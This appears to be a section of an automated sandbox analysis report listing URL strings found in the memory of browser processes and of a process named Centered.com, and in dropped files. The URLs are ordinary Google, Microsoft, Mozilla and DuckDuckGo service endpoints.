                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000015.00000003.1801618856.00005938006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.28.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
                Source: 86911717-b4b7-493b-81e2-698d6cc9ccc4.tmp.29.drString found in binary or memory: https://clients2.google.com
                Source: chrome.exe, 00000015.00000003.1797008433.000000D4002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1797025125.000000D4002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888205993.000036EC00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888460148.000036EC00722000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889239936.000036EC00946000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888951306.000036EC00874000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2012467887.000033FC00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.28.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: 86911717-b4b7-493b-81e2-698d6cc9ccc4.tmp.29.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: chrome.exe, 00000015.00000002.1889610509.000036EC009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000015.00000002.1889610509.000036EC009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000015.00000002.1892619156.000036EC00ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.29.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: 2cc80dabc69f58b6_0.28.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.29.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887468190.000036EC00484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887468190.000036EC00484000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891145184.000036EC00DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
                Source: chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log4.28.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ai
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Di
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Fj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ki
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ni
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Pj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ui
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Zj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/_i
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/bi
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj8Y
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/ii
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/li
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/si
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/tg
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vi
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/xj
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~g
                Source: chrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/Y8i
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 00000015.00000002.1897791978.000059380078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 0000001A.00000002.2013976546.000033FC00324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000015.00000002.1888137937.000036EC00650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890637847.000036EC00CA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000015.00000003.1845800410.000036EC0199C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000015.00000002.1896643585.0000593800238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844836944.000036EC01994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1845800410.000036EC0199C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889700888.000036EC00A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000015.00000003.1801174151.0000593800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1847108195.000059380080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000015.00000003.1845594130.000036EC01998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1844836944.000036EC01994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1845800410.000036EC0199C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard6
